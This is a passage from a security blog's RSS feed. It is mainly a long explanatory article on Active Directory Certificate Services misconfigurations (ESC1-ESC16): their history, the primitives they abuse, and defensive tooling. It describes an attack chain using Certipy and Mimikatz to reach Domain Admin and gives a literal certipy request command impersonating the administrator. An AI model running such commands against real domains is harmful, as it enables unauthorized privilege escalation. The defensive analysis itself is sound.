  { q: &quot;Why is attenuation without a round-trip the load-bearing property of macaroons in an agent setting?&quot;, a: &quot;An agent talks to many tools with many scope shapes; the holder can derive a weaker per-tool macaroon by appending a caveat and a fresh HMAC without round-tripping the issuer; the holder cannot un-attenuate; the issuer does not have to be online.&quot; },
  { q: &quot;What is the MSRC servicing-criteria policy ceiling and why does it matter for an AgentPrincipal?&quot;, a: &quot;Under the MSRC document, within the same logon session and the same primary token, a defect that requires the attacker to already be running as the user is treated as defense-in-depth rather than a CVE-eligible servicing event; for an OS-level AgentPrincipal to be a defensible security boundary the MSRC document itself would have to be amended to add the user-versus-agent split to the boundary taxonomy.&quot; }
]} /&amp;gt;&lt;/p&gt;
</content:encoded><category>windows-security</category><category>identity</category><category>ai-agents</category><category>fido-aatwg</category><category>kerberos</category><category>appcontainer</category><category>entra-agent-id</category><author>noreply@paragmali.com (Parag Mali)</author></item><item><title>Certified Pre-Owned: AD CS and Active Directory&apos;s Second Trust Root</title><link>https://paragmali.com/blog/certified-pre-owned-ad-cs-and-active-directorys-second-trust/</link><guid isPermaLink="true">https://paragmali.com/blog/certified-pre-owned-ad-cs-and-active-directorys-second-trust/</guid><description>AD CS ESC1-ESC16: how Microsoft shipped Certificate Services in 2000, what SpecterOps named in 2021, and why the catalog grows faster than the patches.</description><pubDate>Mon, 25 May 2026 00:00:00 GMT</pubDate><content:encoded>
**Microsoft Certificate Services shipped in Windows 2000 Server on February 17, 2000 and was renamed Active Directory Certificate Services in Windows Server 2008.** Its misconfigurations remained admin-tunable knobs without numbered names for twenty-one years. In June 2021, Will Schroeder and Lee Christensen at SpecterOps published *Certified Pre-Owned* and named eight of them ESC1 through ESC8. Through 2025 the community extended the catalog to ESC16 across IFCR, Compass Security, SpecterOps, TrustedSec, and independent researchers, each one abusing one of six primitives: the template, the issuing authority, the transport, the mapping, the authentication step, or the persistence substrate. Two ESCs have cleanly received CVE-class Microsoft patches (EKUwu / ESC15 -&amp;gt; CVE-2024-49019; ESC8 received KB5005413 *hardening guidance* rather than a CVE, and the adjacent Certifried CVE-2022-26923 patches the dNSHostName impersonation chain on the Machine template rather than a numbered ESC); the rest are administrative hardening matters per Microsoft&apos;s Windows Security Servicing Criteria. The KB5014754 strong-mapping rollout closed ESC9 and ESC10 but is bypassed by ESC16. The architectural property -- that every CA in NTAuth is a key parallel to krbtgt that can mint a Domain Admin authenticator -- is not closable by any patch. The operational playbook is to run Locksmith, BloodHound CE, MDI, PSPKIAudit, and Certipy in parallel, ingest CA logs, and prepare a Lane-3 CA rebuild before you need it.
&lt;h2&gt;1. Two Hours, No KRBTGT, No Touch on Tier Zero&lt;/h2&gt;
&lt;p&gt;The operator&apos;s stopwatch reads two hours and seven minutes when the SOCKS proxy lights up with a Ticket-Granting Ticket for the Domain Administrator account. No service was crashed. No LSASS process was touched. No Tier-Zero principal had its password reset. The &lt;a href=&quot;https://paragmali.com/blog/krbtgt-the-account-that-owns-active-directory/&quot; rel=&quot;noopener&quot;&gt;&lt;code&gt;krbtgt&lt;/code&gt; account hash&lt;/a&gt; from last quarter&apos;s rotation is still good. The certificate that minted the ticket was issued, signed, and logged by the enterprise&apos;s own Certificate Authority -- the one the IT director&apos;s slide deck calls &quot;internal PKI&quot; -- against a template the help desk uses to enroll Wi-Fi clients.&lt;/p&gt;
&lt;p&gt;Walk the chain backwards. The operator joined &lt;code&gt;Domain Users&lt;/code&gt; four hours ago via a phishing payload that never escalated past medium integrity. They ran one tool. Certipy &lt;code&gt;find&lt;/code&gt; enumerated every certificate template the foothold account was permitted to enroll in [@certipy-gh]. One of those templates -- call it &lt;code&gt;WiFi-Auth&lt;/code&gt; -- had three properties: low-privilege enrollment open to &lt;code&gt;Authenticated Users&lt;/code&gt;, the Client Authentication Extended Key Usage attached, and the &lt;code&gt;CT_FLAG_ENROLLEE_SUPPLIES_SUBJECT&lt;/code&gt; bit flipped on. Certipy &lt;code&gt;req&lt;/code&gt; produced a Certificate Signing Request that supplied &lt;code&gt;DOMAIN\Administrator&lt;/code&gt; as the Subject Alternative Name. The Enterprise CA, doing exactly what its template configured it to do, issued the certificate. Certipy &lt;code&gt;auth -pfx&lt;/code&gt; exchanged the certificate for a TGT via the Public Key Cryptography for Initial Authentication extension to Kerberos. Mimikatz &lt;code&gt;ptt&lt;/code&gt; loaded the TGT into the operator&apos;s session. Domain Admin.&lt;/p&gt;
&lt;p&gt;What did not fire is the part that frustrates the incident response team. There was no Windows Event 4624 for the Administrator account anywhere on the domain. Microsoft Defender for Identity raised no lateral-movement alert. No Pass-the-Ticket detection triggered, because the ticket was minted as fresh PKINIT authentication, not replayed. The only artifact in the entire chain was a single Event ID 4886 in the CA&apos;s issuance log -- the event the SOC&apos;s SIEM does not ingest, because the SOC&apos;s SIEM was built to follow &lt;code&gt;krbtgt&lt;/code&gt; and not to follow PKI.&lt;/p&gt;

RFC 4556&apos;s Public Key Cryptography for Initial Authentication in Kerberos. The protocol extension that lets a Kerberos client present a certificate to a Key Distribution Center and receive a Ticket-Granting Ticket in return. Authored by L. Zhu (Microsoft) and B. Tung (Aerospace), published in June 2006 [@rfc4556]. PKINIT is the authentication step that converts an issued certificate into a TGT, and therefore the step every ESC must cross to convert a misconfigured template into Domain Admin.
&lt;p&gt;The TGT in this scenario is produced by Active Directory&apos;s Key Distribution Center after it validates the certificate against its trusted certificate stores. The KDC does not call back to the CA -- it trusts any certificate signed by a CA published into the forest&apos;s &lt;code&gt;NTAuthCertificates&lt;/code&gt; container. That trust relationship is the load-bearing detail; we will return to it in section eight.&lt;/p&gt;
&lt;p&gt;So how is any of this possible? The operator&apos;s organization rotated krbtgt twice last quarter, runs a top-quartile EDR product, and bought Microsoft Defender for Identity with the AD CS sensor add-on. The simple answer is: rotating krbtgt closes one of the keys that can mint a Domain Admin authenticator in this forest. It does not close the others. The forest has more than one such key, and nobody told the IR plan.&lt;/p&gt;
&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;Key idea:&lt;/strong&gt; Every domain whose CA can issue authentication certificates has two trust roots that can mint a Domain Admin authenticator, not one. The first is the &lt;code&gt;krbtgt&lt;/code&gt; account hash. The second is the private key of any Certificate Authority published into the forest&apos;s &lt;code&gt;NTAuthCertificates&lt;/code&gt; container. Rotating one does not touch the other. The catalog this article walks through is the community&apos;s attempt to enumerate the misconfigurations that turn the second trust root into a path low-privilege users can walk.&lt;/p&gt;
&lt;/blockquote&gt;
&lt;p&gt;The vocabulary for this surface -- the named techniques, the numbered identifiers, the tool that enumerates them in eleven seconds -- did not exist until June 2021. The misconfigurations did. They had been shipping as customer-tunable knobs in Microsoft&apos;s identity stack since Windows Server 2003. If this surface has been available for twenty-one years, why did it take twenty-one years for someone to give the misconfigurations names?&lt;/p&gt;
&lt;h2&gt;2. Twenty-One Years of Unnamed Knobs&lt;/h2&gt;
&lt;p&gt;February 17, 2000. Windows 2000 Server reaches general availability. Microsoft Certificate Services -- the AD-integrated CA role -- ships as an optional server component on day one [@wikipedia-w2k]. The role is &lt;em&gt;not yet&lt;/em&gt; called Active Directory Certificate Services; that rename arrives with Windows Server 2008. The shipping defaults that the operator in section one just exploited were already buildable on the 2000 release.&lt;/p&gt;

You will see both anchor dates in the literature. Semperis&apos;s CVE-2022-26923 retrospective writes that &quot;In Windows Server 2008, Microsoft introduced AD CS&quot; [@semperis-cve]. The Microsoft Learn current overview describes AD CS as a &quot;Windows Server role for issuing and managing public key infrastructure (PKI) certificates&quot; [@msl-adcs-current] without distinguishing the ship date from the rename date. This article uses the dual anchor: the role *shipped* in 2000 as Microsoft Certificate Services, and was *renamed* Active Directory Certificate Services in 2008. The misconfigurations the ESC catalog enumerates were enabled by Windows Server 2003&apos;s V2 templates and have not been default-off since.
&lt;p&gt;The misconfigurations the catalog later attacks did not all arrive at once. Three Microsoft releases between 2000 and 2008 built the surface piece by piece.&lt;/p&gt;
&lt;p&gt;Windows Server 2003 (general availability April 24, 2003 [@wikipedia-ws2003]) shipped Version 2 (V2) certificate templates, user and computer autoenrollment over the V2 schema, and the AD-stored template store [@msl-ws2003-ca]. Most of the surface ESC1 and ESC4 later attack first appears in this release: &lt;code&gt;msPKI-Certificate-Name-Flag&lt;/code&gt;, the &lt;code&gt;CT_FLAG_ENROLLEE_SUPPLIES_SUBJECT&lt;/code&gt; bit, per-template DACLs editable in Active Directory Sites and Services, and the modifiable Extended Key Usage list. The Enrollee-Supplies-Subject flag, in particular, is a customer-tunable bit; it ships off by default on the stock templates but is a one-click enable in &lt;code&gt;certtmpl.msc&lt;/code&gt; [@msl-adcs-2012r2]. Microsoft&apos;s documentation warned against it on sensitive templates. It did not warn against it as a numbered identifier.&lt;/p&gt;
&lt;p&gt;Certificate templates have version numbers tied to the Active Directory schema. V1 templates ship with Windows 2000 and are non-modifiable from the GUI. V2 templates ship with Windows Server 2003 and are fully modifiable; they introduce the per-template DACL and the editable &lt;code&gt;msPKI-Certificate-Name-Flag&lt;/code&gt; properties the catalog attacks. V3 templates ship with Windows Server 2008 and add Suite B cryptography support. The catalog mostly attacks V2 templates; ESC15 specifically attacks the residual V1 templates that ship pre-installed and cannot be removed.&lt;/p&gt;
&lt;p&gt;Windows Server 2008 (general availability February 27, 2008 [@wikipedia-ws2008]) renamed the role to Active Directory Certificate Services and added new role services: Online Certificate Status Protocol Responder, Network Device Enrollment Service, Certificate Enrollment Web Service, and Certificate Enrollment Policy Web Service. These role services expanded the transport surface that ESC8 and ESC11 later attack. The Windows Server 2012 R2 documentation page &lt;code&gt;hh831740&lt;/code&gt; became the canonical reference SpecterOps later linked from the 2021 paper [@msl-adcs-2012r2].&lt;/p&gt;
&lt;p&gt;Between 2008 and 2021 Microsoft published hardening guidance for AD CS in several places -- Test Lab Guides, PKI design pages, role-service deployment docs [@msl-pki-design]. The guidance covered template ACLs, manager approval, least-privilege enrollment, and the Enrollee-Supplies-Subject bit. It did not assign numbered identifiers to specific dangerous combinations. It did not appear in MSRC&apos;s vulnerability pipeline. It did not get a Common Vulnerabilities and Exposures registration. The configurations were &lt;em&gt;documented but unnamed&lt;/em&gt;.&lt;/p&gt;
&lt;p&gt;In 2019, two seeds for the named class appeared. Géraud de Drouas at the French ANSSI published a brief GitHub note that the Active Directory &lt;code&gt;Public-Information&lt;/code&gt; property set includes &lt;code&gt;altSecurityIdentities&lt;/code&gt;, which lets an attacker with that permission map their own certificate onto a privileged user [@dedrouas-altsec]. The note ends with a striking line: &quot;This issue has been responsibly disclosed to MSRC and received a &apos;won&apos;t fix&apos; response.&quot; The same year Microsoft began documenting the &lt;code&gt;szOID_NTDS_CA_SECURITY_EXT&lt;/code&gt; extension in certificate-related KBs, though without making it default-on. The substrate for what would become ESC9, ESC10, and ESC14 was already in place; nobody had named it yet.&lt;/p&gt;
&lt;p&gt;Twenty-one years from the role&apos;s ship date, then. Twenty-one years of admin-tunable knobs. No numbered identifiers, no patch cadence, no scanner enumeration, no MSRC pipeline. Microsoft documented every one of these settings individually, often well; what was missing was the &lt;em&gt;catalog&lt;/em&gt;. Hardening guidance without numbered identifiers produces no defensive prioritization in real enterprises, because enterprise security programs prioritize against catalogs, not against documentation pages [@bollinger-ekuwu]. So what happened in June 2021 that turned a documentation pattern into a catalog?&lt;/p&gt;

flowchart LR
    A[2000&lt;br /&gt;Microsoft Certificate Services&lt;br /&gt;ships in Windows 2000 Server] --&amp;gt; B[2003&lt;br /&gt;V2 templates&lt;br /&gt;and autoenrollment]
    B --&amp;gt; C[2008&lt;br /&gt;Role renamed&lt;br /&gt;Active Directory&lt;br /&gt;Certificate Services]
    C --&amp;gt; D[2019&lt;br /&gt;de Drouas notes&lt;br /&gt;altSecurityIdentities abuse]
    D --&amp;gt; E[June 2021&lt;br /&gt;SpecterOps catalog&lt;br /&gt;ESC1 through ESC8]
    E --&amp;gt; F[2021 to 2022&lt;br /&gt;KB5005413&lt;br /&gt;CVE-2022-26923&lt;br /&gt;KB5014754]
    F --&amp;gt; G[2022 to 2023&lt;br /&gt;ESC9 to ESC12&lt;br /&gt;from Lyak Heiniger Knobloch]
    G --&amp;gt; H[2024&lt;br /&gt;ESC13 to ESC15&lt;br /&gt;Knudsen and Bollinger&lt;br /&gt;CVE-2024-49019]
    H --&amp;gt; I[2025&lt;br /&gt;ESC16&lt;br /&gt;strong-mapping full enforcement]
&lt;h2&gt;3. Six Primitives Every ESC Abuses&lt;/h2&gt;
&lt;p&gt;Before opening the catalog, install the vocabulary. Every ESC -- without exception -- abuses one of six primitives: the template, the issuing authority, the enrollment transport, the certificate mapping, the authentication bridge, and the persistence substrate. Once you have these six names in your head, the sixteen ESCs compose into a small grid.&lt;/p&gt;
&lt;h3&gt;The Template&lt;/h3&gt;
&lt;p&gt;A certificate template is an Active Directory object stored in the &lt;code&gt;CN=Certificate Templates,CN=Public Key Services,CN=Services,CN=Configuration&lt;/code&gt; partition that tells an Enterprise CA what kind of certificate to issue and to whom. Templates carry their own DACL controlling who can enroll, who can write, and who can autoenroll. They carry a &lt;code&gt;msPKI-Certificate-Name-Flag&lt;/code&gt; attribute whose bits control how the Subject and Subject Alternative Name fields are populated. They carry an Extended Key Usage list that names what the certificate is permitted to do. And they carry a Manager Approval bit that gates whether issuance is automatic or whether a CA officer must approve each request [@msl-adcs-2012r2].&lt;/p&gt;

The Active Directory-stored object specifying who can request what kind of certificate from an Enterprise CA. Templates carry per-object DACLs (enrollment, autoenrollment, write), a `msPKI-Certificate-Name-Flag` controlling Subject and SAN behavior, an Extended Key Usage list, and a Manager Approval bit. V1 templates (Windows 2000) are non-modifiable; V2 templates (Windows Server 2003) are fully modifiable; V3 templates (Windows Server 2008) add Suite B cryptography.
&lt;p&gt;ESC1, ESC2, ESC3, ESC4, and ESC15 all attack the template. They differ only in which template property is misconfigured. (ESC9 also begins on a template flag, &lt;code&gt;CT_FLAG_NO_SECURITY_EXTENSION&lt;/code&gt;, but its effect lives in the mapping layer; we file it under mapping below, matching SpecterOps&apos;s own Certify taxonomy [@specterops-certify-docs-index].)&lt;/p&gt;
&lt;h3&gt;The Issuing Authority&lt;/h3&gt;
&lt;p&gt;An Enterprise CA is a Windows Server role service that signs certificate requests against published templates. To be trusted for authentication, the CA must be published into the forest&apos;s &lt;code&gt;NTAuthCertificates&lt;/code&gt; container. That container is the single list of CA certificates the Key Distribution Center trusts for PKINIT. The CA carries its own security descriptor controlling who can enroll, who can manage certificates, and who can manage the CA itself. It carries two registry flags that change its issuance behavior: &lt;code&gt;EDITF_ATTRIBUTESUBJECTALTNAME2&lt;/code&gt;, which permits requesters to specify arbitrary Subject Alternative Names, and &lt;code&gt;IF_ENFORCEENCRYPTICERTREQUEST&lt;/code&gt;, which controls whether RPC enrollment requires packet privacy [@compass-esc11]. The 2022 KB5014754 patch introduced &lt;code&gt;szOID_NTDS_CA_SECURITY_EXT&lt;/code&gt;, a Microsoft-specific extension carrying the requester&apos;s Security Identifier; that extension is the load-bearing artifact of the strong-mapping enforcement track [@kb5014754].&lt;/p&gt;

The AD-integrated certificate authority role in AD CS. Publishes certificate templates into Active Directory, processes certificate requests against those templates, and signs issued certificates with its private key. To be trusted for Windows authentication, the CA&apos;s certificate must be present in the forest-wide `NTAuthCertificates` container.

The AD-published container `CN=NTAuthCertificates,CN=Public Key Services,CN=Services,CN=Configuration` listing CA certificates trusted by the Key Distribution Center for client authentication. Any certificate signed by a CA in this container can, given a valid mapping, mint a Kerberos Ticket-Granting Ticket. Publishing a CA into NTAuth is the moment that CA&apos;s private key becomes a trust root parallel to krbtgt.
&lt;p&gt;ESC5, ESC6, ESC7, and ESC16 attack the issuing authority itself -- its DACL, its registry flags, its extension policy. (ESC11&apos;s RPC packet-privacy gap is a CA-side configuration, but its abuse is an NTLM relay; we group it with ESC8 under transport, matching the §5 diagram.)&lt;/p&gt;
&lt;h3&gt;The Enrollment Transport&lt;/h3&gt;
&lt;p&gt;A certificate is requested over a network protocol. The default transport is DCOM/MS-WCCE -- the Windows Client Certificate Enrollment protocol, an RPC-based interface that ships enabled on every Enterprise CA [@ms-icpr-spec]. Additional transports ship as separate role services: HTTP Web Enrollment (IIS-based, with NTLM auth by default), the Certificate Enrollment Web Service (web service, supports basic and Kerberos), the Network Device Enrollment Service (the SCEP gateway), and the Certificate Enrollment Policy Web Service. Each transport is a network attack surface for relay primitives that route a coerced NTLM authentication into a certificate request.&lt;/p&gt;
&lt;p&gt;ESC8 attacks the HTTP Web Enrollment transport. ESC11 attacks the RPC transport. Both are &lt;a href=&quot;https://paragmali.com/blog/ntlmless-the-death-of-ntlm-in-windows/&quot; rel=&quot;noopener&quot;&gt;NTLM-relay attacks&lt;/a&gt;; they differ only in which transport the relayed authentication targets.&lt;/p&gt;
&lt;p&gt;The CA&apos;s security model distinguishes two rights that look similar but differ in scope. &lt;em&gt;Issue and Manage Certificates&lt;/em&gt; permits the holder to approve pending requests, revoke issued certificates, and read the request store. &lt;em&gt;Manage CA&lt;/em&gt; permits the holder to edit the CA&apos;s own configuration -- including its registry-controlled extension policy and its DACL. ESC7 attacks the latter. The escalation chain that follows ESC7 typically pivots to ESC4 (edit a template) or to issuing a certificate directly via a CA officer&apos;s request-approval right.&lt;/p&gt;
&lt;h3&gt;The Certificate Mapping&lt;/h3&gt;
&lt;p&gt;When a CA issues an authentication certificate, the certificate identifies a principal -- a user or a computer. The Key Distribution Center has to decide which Active Directory principal that certificate represents. Two mappings exist. &lt;em&gt;Implicit mapping&lt;/em&gt; reads the Subject Alternative Name (or the Subject, on older templates) and looks up the principal by User Principal Name. &lt;em&gt;Explicit mapping&lt;/em&gt; reads the AD principal&apos;s own &lt;code&gt;altSecurityIdentities&lt;/code&gt; attribute, which holds one or more X.509 issuer/serial expressions [@dedrouas-altsec]. The May 2022 KB5014754 patch redefined which mappings the KDC accepts: explicit mappings using &lt;code&gt;X509IssuerSerialNumber&lt;/code&gt;, &lt;code&gt;X509SKI&lt;/code&gt;, or &lt;code&gt;X509SHA1PublicKey&lt;/code&gt; are &lt;em&gt;strong&lt;/em&gt;; everything else is &lt;em&gt;weak&lt;/em&gt; and will be rejected once Full Enforcement is active [@kb5014754].&lt;/p&gt;

OID 1.3.6.1.4.1.311.25.2. The Microsoft certificate extension introduced by KB5014754 that embeds the SID of the requesting Active Directory principal directly into the issued certificate. When present, the KDC matches the certificate against the principal whose SID is embedded, defeating SAN-supply attacks like ESC1. The extension is the load-bearing mechanism of strong mapping enforcement.

Per KB5014754, explicit `altSecurityIdentities` entries using the `X509IssuerSerialNumber`, `X509SKI`, or `X509SHA1PublicKey` formats are *strong*. All other formats -- including implicit UPN and SAN matching -- are *weak* and rejected once Full Enforcement mode is active (February 11, 2025 default; legacy-mapping registry override removed September 9, 2025) [@kb5014754]. The strong-mapping track was the single largest Microsoft mitigation of the ESC era.
&lt;p&gt;ESC9, ESC10, ESC13, and ESC14 all attack the mapping. They abuse the gap between what a certificate asserts and which AD principal the KDC binds it to.&lt;/p&gt;
&lt;h3&gt;The Authentication Step&lt;/h3&gt;
&lt;p&gt;This component is the part of Windows that turns a certificate into an authenticator. For &lt;a href=&quot;https://paragmali.com/blog/kerberos-in-windows-the-other-half-of-ntlmless/&quot; rel=&quot;noopener&quot;&gt;Kerberos&lt;/a&gt;, the protocol is PKINIT (RFC 4556 [@rfc4556]): client presents a cert, KDC validates the cert and the mapping, KDC issues a TGT. For TLS-based services -- LDAPS, RDP with smart card, IIS with client cert -- the protocol is Schannel. For the legacy smart-card pipeline, the path is the combination of the Smart Card Resource Manager and PKINIT.&lt;/p&gt;
&lt;p&gt;No ESC attacks this step directly. Every ESC must &lt;em&gt;cross&lt;/em&gt; it to convert a misconfigured template, ACL, or mapping into a usable authenticator. The authentication step is the choke point; it is also the point Microsoft has reshaped most heavily with KB5014754.&lt;/p&gt;
&lt;h3&gt;The Persistence Substrate&lt;/h3&gt;
&lt;p&gt;An issued certificate is not a transient credential. It is a signed authenticator with a configurable validity period (one year is common, ten years is permitted). The certificate authenticates the embedded principal as long as the certificate is valid and not revoked. That property is what the SpecterOps paper&apos;s &lt;code&gt;DPERSIST&lt;/code&gt; and &lt;code&gt;THEFT&lt;/code&gt; classes attack [@cpo-blog]. UnPAC-the-Hash recovers the NTLM hash from a PKINIT-issued TGT, giving the attacker a password-equivalent credential they did not previously have. The Golden Certificate attack steals the CA&apos;s own private key, granting forever-issuance against the entire forest.&lt;/p&gt;
&lt;p&gt;This article scopes those attacks to a sidebar; the body walks the ESC1 to ESC16 escalation catalog. But every ESC ends in the persistence substrate: the certificate the attacker walks out with is the receipt that survives password rotation.&lt;/p&gt;
&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;Note:&lt;/strong&gt; A &lt;em&gt;primitive&lt;/em&gt; is a Microsoft-shipped knob, flag, ACL, or protocol that, when misconfigured, becomes part of an escalation. An &lt;em&gt;exploitation chain&lt;/em&gt; is the specific sequence of operator actions that turns one or more misconfigured primitives into a Domain Admin authenticator. ESCs are exploitation chains, not primitives. ESC1, for example, abuses the &lt;em&gt;template&lt;/em&gt; primitive&apos;s &lt;code&gt;CT_FLAG_ENROLLEE_SUPPLIES_SUBJECT&lt;/code&gt; bit, combined with the &lt;em&gt;bridge&lt;/em&gt; primitive (PKINIT), to produce the authenticator. The catalog enumerates chains; the six categories above enumerate the substrate.&lt;/p&gt;
&lt;/blockquote&gt;
&lt;p&gt;Now that the vocabulary is in place, sixteen named attacks compose neatly onto a 6 by 16 grid. Here is the moment they did.&lt;/p&gt;

flowchart TD
    T[Template&lt;br /&gt;per-template DACL&lt;br /&gt;Name-Flag bits&lt;br /&gt;EKU list&lt;br /&gt;Manager Approval]
    A[Issuing Authority&lt;br /&gt;NTAuth membership&lt;br /&gt;CA security descriptor&lt;br /&gt;EDITF flags&lt;br /&gt;extension policy]
    X[Enrollment Transport&lt;br /&gt;RPC/MS-WCCE&lt;br /&gt;HTTP Web Enrollment&lt;br /&gt;CES/CEP&lt;br /&gt;NDES/SCEP]
    M[Certificate Mapping&lt;br /&gt;implicit UPN/SAN&lt;br /&gt;explicit altSecurityIdentities&lt;br /&gt;strong vs weak&lt;br /&gt;SID extension]
    B[Authentication Bridge&lt;br /&gt;PKINIT for Kerberos&lt;br /&gt;Schannel for TLS&lt;br /&gt;smart-card pipeline]
    P[Persistence Substrate&lt;br /&gt;validity period&lt;br /&gt;UnPAC-the-Hash&lt;br /&gt;Golden Certificate&lt;br /&gt;CRL bypass]
    T --&amp;gt; A
    A --&amp;gt; X
    X --&amp;gt; B
    A --&amp;gt; M
    M --&amp;gt; B
    B --&amp;gt; P
&lt;h2&gt;4. Certified Pre-Owned&lt;/h2&gt;
&lt;p&gt;Will Schroeder pushes the SpecterOps Medium post live on June 17, 2021. (A revision tagged &lt;code&gt;[EDIT 06/22/21]&lt;/code&gt; follows the next week; the literature settles on &quot;June 2021&quot; as the canonical date [@cpo-blog].) The whitepaper PDF drops in the same window and is rehosted on the SpecterOps domain the following year [@cpo-whitepaper]. Seven weeks later, on August 5, Schroeder and Christensen present &lt;em&gt;Certified Pre-Owned: Abusing Active Directory Certificate Services&lt;/em&gt; at Black Hat USA 2021. Three GhostPack tools ship to GitHub on schedule: PSPKIAudit for defense [@pspkiaudit-gh], Certify for offense [@certify-gh], and ForgeCert for Golden Certificate work.&lt;/p&gt;
&lt;p&gt;The paper names eight escalation paths and three persistence and theft prefixes:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;&lt;strong&gt;ESC1 through ESC8&lt;/strong&gt; -- &lt;em&gt;escalation&lt;/em&gt; paths from a low-privilege foothold to Domain Admin&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;DPERSIST&lt;/strong&gt; -- &lt;em&gt;domain persistence&lt;/em&gt; via forged certificates after CA private-key compromise&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;THEFT&lt;/strong&gt; -- &lt;em&gt;certificate and credential theft&lt;/em&gt; primitives, including the UnPAC-the-Hash technique&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;DETECT&lt;/strong&gt; -- &lt;em&gt;defensive detection&lt;/em&gt; primitives the team mapped to each abuse&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;The contribution was not the &lt;em&gt;discovery&lt;/em&gt; of new individual primitives. Most of the individual misconfigurations had appeared in Microsoft&apos;s hardening guidance or in scattered community posts well before the paper. ENROLLEE_SUPPLIES_SUBJECT had been a documented warning for a decade. NTLM relay to IIS had been a known attack class since at least 2008. The &lt;code&gt;EDITF_ATTRIBUTESUBJECTALTNAME2&lt;/code&gt; flag was a documented option in &lt;code&gt;certutil&lt;/code&gt; since Windows Server 2008 R2. What the paper contributed was the &lt;em&gt;unified catalog&lt;/em&gt; -- numbered identifiers, reproducible exploitation, a tool that enumerated each path, and a single document tying every abuse to its primitive and its mitigation.&lt;/p&gt;

While AD CS is not installed by default for Active Directory environments, from our experience in enterprise environments it is widely deployed, and the security ramifications of misconfigured certificate service instances are enormous. -- Will Schroeder and Lee Christensen, *Certified Pre-Owned* (June 2021) [@cpo-blog]
&lt;p&gt;Microsoft&apos;s response was uncharacteristically fast. KB5005413 published in late July 2021 -- roughly six weeks after the blog -- recommending Extended Protection for Authentication and &quot;Require SSL&quot; on the AD CS Web Enrollment and Certificate Enrollment Web Service role services [@kb5005413]. The KB closes ESC8 over HTTPS when EPA is enabled. It does not close ESC1 through ESC7, and it does not close ESC11 (which had not yet been named).&lt;/p&gt;
&lt;p&gt;The &quot;ESC&quot; prefix is an acronym for &lt;em&gt;escalation&lt;/em&gt;. The catalog uses three sibling prefixes from the same paper: &lt;code&gt;DPERSIST&lt;/code&gt; for &lt;em&gt;domain persistence&lt;/em&gt;, &lt;code&gt;THEFT&lt;/code&gt; for credential and certificate theft, and &lt;code&gt;DETECT&lt;/code&gt; for defensive detection identifiers. ESC numbering is consecutive but not contiguous in time -- ESC12 (a hardware substrate attack) was disclosed by Knobloch in October 2023 [@knobloch-esc12] [@knobloch-esc12-archive], four months before Knudsen disclosed ESC13 and ESC14 from SpecterOps. The numbering tracks the order of community disclosure, not a planned roadmap.&lt;/p&gt;
&lt;p&gt;Here is the observation that this article will load-bear: the breakthrough was &lt;em&gt;naming&lt;/em&gt;, not discovery. Until SpecterOps named the eight configurations, every one of them had been documented somewhere in Microsoft Learn or in a community blog. The hardening documentation had existed for years and had produced essentially no defensive prioritization in real enterprises. Microsoft Defender for Identity did not flag ESC1 templates. BloodHound did not graph ESC4-shaped DACLs. SIEMs did not ingest CA Event ID 4886. No commercial scanner shipped a rule for the Enrollee-Supplies-Subject bit. The reason was not that the information was inaccessible. The reason was that the &lt;em&gt;configurations had no names&lt;/em&gt; -- and an enterprise security program cannot prioritize against an unnamed configuration.&lt;/p&gt;
&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;Key idea:&lt;/strong&gt; Naming is itself a defensive primitive. The 2021 SpecterOps catalog converted twenty-one years of unnamed admin-tunable knobs into a numbered backlog that scanners could enumerate, BloodHound could path-find, MSRC could patch, and operators could prioritize. Every subsequent mitigation generation -- KB5005413, CVE-2022-26923, KB5014754, CVE-2024-49019, BloodHound CE ADCS edges, Locksmith, Microsoft Defender for Identity&apos;s posture assessments -- builds on the catalog rather than on the underlying hardening documentation. The catalog is the security primitive; the patches are downstream of the catalog.&lt;/p&gt;
&lt;/blockquote&gt;
&lt;p&gt;Eight ESCs in 2021. Within fifteen months, two researchers extended the catalog past the original boundary: Oliver Lyak at the Institute For Cyber Risk added ESC9 and ESC10 in August 2022 [@lyak-certipy-4-archive]; Sylvain Heiniger at Compass Security added ESC11 in November 2022 [@compass-esc11]. Hans-Joachim Knobloch added ESC12 in October 2023 [@knobloch-esc12]. SpecterOps&apos;s Jonas Bülow Knudsen added ESC13 in February 2024 [@knudsen-esc13] and ESC14 two weeks later [@knudsen-esc14]. Justin Bollinger at TrustedSec added ESC15 in October 2024 [@bollinger-ekuwu]. Lyak named ESC16 in 2025 against a workaround Schroeder himself had documented in 2022 [@specterops-esc16-docs]. Sixteen ESCs by the time you read this. Here is what each one does.&lt;/p&gt;
&lt;h2&gt;5. The Catalog: ESC-1 through ESC-16&lt;/h2&gt;
&lt;p&gt;Of the sixteen named ESCs, the original eight name the surface; ESC9 through ESC16 name the residual after every Microsoft mitigation shipped to date. We walk them in primitive-grouped order, following the same taxonomy the SpecterOps Certify documentation uses: template misconfigurations, access-control vulnerabilities, CA configuration issues, certificate mapping issues, and one hardware-substrate sidebar [@specterops-certify-docs-index].&lt;/p&gt;
&lt;h3&gt;Template misconfigurations: ESC1, ESC2, ESC3&lt;/h3&gt;
&lt;p&gt;&lt;strong&gt;ESC1 -- Misconfigured Certificate Template.&lt;/strong&gt; A V2 template that lets a low-privilege principal enroll, has Client Authentication in its Extended Key Usage list, has &lt;code&gt;CT_FLAG_ENROLLEE_SUPPLIES_SUBJECT&lt;/code&gt; set, and does &lt;em&gt;not&lt;/em&gt; require Manager Approval. The attacker requests a certificate naming the target principal in the Subject Alternative Name; the CA issues; the certificate maps via UPN to the target; PKINIT produces a TGT as the target. One operator chain: &lt;code&gt;certipy req -u user -p pass -ca CA -template VulnTemplate -upn administrator@domain.local&lt;/code&gt;. First disclosed by SpecterOps in June 2021 [@cpo-blog]. BloodHound CE edge: &lt;code&gt;ADCSESC1&lt;/code&gt; [@bh-esc1-edge].&lt;/p&gt;

The `CT_FLAG_ENROLLEE_SUPPLIES_SUBJECT` bit in `msPKI-Certificate-Name-Flag`. When set, the requester is allowed to supply the Subject or Subject Alternative Name in the CSR rather than having the CA build the Subject from the requester&apos;s own AD attributes. This is the load-bearing primitive of ESC1.

```powershell
